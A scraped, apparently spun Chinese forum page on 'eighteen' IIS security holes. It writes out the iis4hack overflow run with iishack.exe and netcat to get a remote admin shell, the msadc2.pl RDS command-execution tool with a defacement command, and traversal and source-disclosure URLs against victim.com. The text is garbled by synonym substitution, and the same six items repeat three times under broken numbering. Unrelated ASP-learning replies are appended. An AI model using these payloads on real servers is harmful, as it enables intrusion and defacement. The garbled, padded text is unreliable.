ASP网站制作之IIS中罕见的十八个平安毛病
楼上说交互性不好,太牵强了吧。在微软提供的一套框架中,利用asp做网站,开发效率高,使用人数少,减少不必要的开销。交互性是互动方式,是有开发人员决定的。iis|平安|平安毛病 1.iis4hack缓冲溢出次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
c:>iishack.exe80/ncx.exe
然后你就利用netcat来毗连你要检测的服务器:
c:>nc80
假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
2.msadc
IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
$perlmsadc2.pl-h
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Usage:msadc.pl-h{-d-X-v}
-h=hostyouwanttoscan(ipordomain)
-d=delaybetweencalls,default1second
-X=dumpIndexServerpathtable,ifavailable
-N=queryVbBusObjforNetBIOSname
-V=useVbBusObjinsteadofActiveDataFactory
-v=verbose
-e=externaldictionaryfileforstep5
-u<hostsharefile>=useUNCfile
-w=Windows95insteadofWindowsNT
-c=v1compatibility(threestepquery)
-s=runonlystep
Ora-Rwillresumea(v2)commandsession
$perlmsadc2.pl-hhttp://www.targe.com/
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Typethecommandlineyouwanttorun(cmd/cassumed):
cmd/c
假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
3.Codebrws.asp
观察文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
4.Showcode.asp
观察文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
5.Null.htw
观察文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
6.webhits.dll&.htw
hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
一个打击者可使用以下的办法来会见体系中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
7.iis4hack缓冲溢出
次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
c:>iishack.exe80/ncx.exe
然后你就利用netcat来毗连你要检测的服务器:
c:>nc80
假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
8.msadc
IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
$perlmsadc2.pl-h
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Usage:msadc.pl-h{-d-X-v}
-h=hostyouwanttoscan(ipordomain)
-d=delaybetweencalls,default1second
-X=dumpIndexServerpathtable,ifavailable
-N=queryVbBusObjforNetBIOSname
-V=useVbBusObjinsteadofActiveDataFactory
-v=verbose
-e=externaldictionaryfileforstep5
-u<hostsharefile>=useUNCfile
-w=Windows95insteadofWindowsNT
-c=v1compatibility(threestepquery)
-s=runonlystep
Ora-Rwillresumea(v2)commandsession
$perlmsadc2.pl-hhttp://www.targe.com/
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Typethecommandlineyouwanttorun(cmd/cassumed):
cmd/c
假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
9.Codebrws.asp
观察文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
10.Showcode.asp
观察文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
11.Null.htw
观察文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
12.webhits.dll&.htw
hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
一个打击者可使用以下的办法来会见体系中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
13.iis4hack缓冲溢出
次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
c:>iishack.exe80/ncx.exe
然后你就利用netcat来毗连你要检测的服务器:
c:>nc80
假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
14.msadc
IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
$perlmsadc2.pl-h
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Usage:msadc.pl-h{-d-X-v}
-h=hostyouwanttoscan(ipordomain)
-d=delaybetweencalls,default1second
-X=dumpIndexServerpathtable,ifavailable
-N=queryVbBusObjforNetBIOSname
-V=useVbBusObjinsteadofActiveDataFactory
-v=verbose
-e=externaldictionaryfileforstep5
-u<hostsharefile>=useUNCfile
-w=Windows95insteadofWindowsNT
-c=v1compatibility(threestepquery)
-s=runonlystep
Ora-Rwillresumea(v2)commandsession
$perlmsadc2.pl-hhttp://www.targe.com/
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Typethecommandlineyouwanttorun(cmd/cassumed):
cmd/c
假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
15.Codebrws.asp
观察文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
16.Showcode.asp
观察文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
17.Null.htw
观察文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
18.webhits.dll&.htw
hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
一个打击者可使用以下的办法来会见体系中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
asp对于服务器的要求较高,一般的服务器如果访问量一大就垮了,不得不重启。 尽管MS自己讲C#内核中更多的象VC,但实际上我还是认为它和Java更象一些吧。首先它是面向对象的编程语言,而不是一种脚本,所以它具有面向对象编程语言的一切特性,比如封装性、继承性、多态性等等,这就解决了刚才谈到的ASP的那些弱点。 Response:从字面上讲是“响应”,因此这个是服务端向客户端发送东西的,例如Response.Write 下面简单介绍一下我学习ASP的方法,希望对想学习ASP的朋友有所帮助... 跟学别的语言一样,先掌握变量,流程控制语句(就是ifwhileselect)等,函数/过程,数组 跟学别的语言一样,先掌握变量,流程控制语句(就是ifwhileselect)等,函数/过程,数组 从事这个行业,那么你可以学ASP语言,简单快速上手,熟练dreamweav排版,写asp代码,熟练photoshop处理图片,打好基础就行了 先学习用frontpage熟悉html编辑然后学习asp和vbscript建议买书进行系统学习 不是很难但是英文要有一点基础网上的教程很少有系统的详细的去买书吧,另不用专门学习vb关于vbscript脚本在asp教材都有介绍
页:
[1]